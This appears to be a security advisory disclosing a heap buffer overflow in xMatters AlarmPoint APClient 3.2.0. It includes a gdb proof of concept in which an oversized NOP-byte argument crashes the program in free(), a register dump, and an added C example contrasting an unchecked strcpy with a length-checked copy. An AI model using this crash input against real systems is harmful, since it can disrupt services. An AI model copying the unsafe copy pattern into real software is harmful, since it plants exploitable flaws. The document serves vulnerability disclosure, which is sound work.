#Authored by Juan Sacco
Information
--------------------
Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
Version: APClient 3.2.0 (native)
Software : xMatters AlarmPoint
Vendor Homepage : http://www.xmatters.com
Vulnerability Type : Heap Buffer Overflow
Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin
Severity : High
Description
------------------
The AlarmPoint Java Server consists of a collection of software
components and software APIs designed to provide a flexible and
powerful set of tools for integrating various applications to
AlarmPoint.
Details
-------------------
AlarmPoint APClient is affected by a Heap Overflow vulnerability in
version APClient 3.2.0 (native).
A heap overflow condition is a buffer overflow, where the buffer that
can be overwritten is allocated in the heap portion of memory, generally
meaning that the buffer was allocated using a routine such as the POSIX
malloc() call.
https://www.owasp.org/index.php/Heap_overflow
Exploit as follows:
Submit a malicious file containing the exploit:
root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$ ./APClient.bin --submit-file maliciousfile.hex
or
(gdb) run `python -c 'print "\x90"*16287'`
Starting program: /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 'print "\x90"*16287'`
Program received signal SIGSEGV, Segmentation fault.
0x0804be8a in free ()
(gdb) i r
eax 0xa303924 170932516
ecx 0xbfb8 49080
edx 0xa303924 170932516
ebx 0x8059438 134583352
esp 0xbfff3620 0xbfff3620
ebp 0xbfff3638 0xbfff3638
esi 0x8059440 134583360
edi 0x80653f0 134632432
eip 0x804be8a 0x804be8a <free+126>
eflags 0x210206 [ PF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
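The heap overflow condition defined above, as an added C illustration of the unchecked pattern beside a length-checked one. This is not APClient code (the advisory does not show the source); the function names and the 1024-byte ARG_BUF_SIZE are assumptions made for the example.

```c
/* Added illustration; function names and ARG_BUF_SIZE are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARG_BUF_SIZE 1024   /* assumed fixed heap buffer size */

/* Unsafe pattern: fixed-size heap buffer, unbounded copy. An argument
 * longer than ARG_BUF_SIZE-1 bytes writes past the allocation and can
 * corrupt allocator metadata, which typically surfaces later as a
 * crash inside free(). Shown for comparison only; never called here. */
char *copy_arg_unsafe(const char *arg)
{
    char *buf = malloc(ARG_BUF_SIZE);
    if (buf == NULL)
        return NULL;
    strcpy(buf, arg);                 /* no length check */
    return buf;
}

/* Hardened pattern: find the terminator within the bound first and
 * refuse anything that does not fit (no silent truncation). */
char *copy_arg_checked(const char *arg)
{
    const char *nul;
    size_t len;
    char *buf;

    if (arg == NULL)
        return NULL;
    nul = memchr(arg, '\0', ARG_BUF_SIZE);
    if (nul == NULL)                  /* no NUL in first ARG_BUF_SIZE bytes */
        return NULL;
    len = (size_t)(nul - arg);
    buf = malloc(ARG_BUF_SIZE);
    if (buf == NULL)
        return NULL;
    memcpy(buf, arg, len + 1);        /* copy includes the terminating NUL */
    return buf;
}

int main(int argc, char **argv)
{
    char *copy = copy_arg_checked(argc > 1 ? argv[1] : "");
    if (copy == NULL) {
        fprintf(stderr, "argument rejected: over %d bytes\n", ARG_BUF_SIZE - 1);
        return 1;
    }
    printf("accepted %zu bytes\n", strlen(copy));
    free(copy);
    return 0;
}
```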
Solution
-------------------
No patch is available at this time.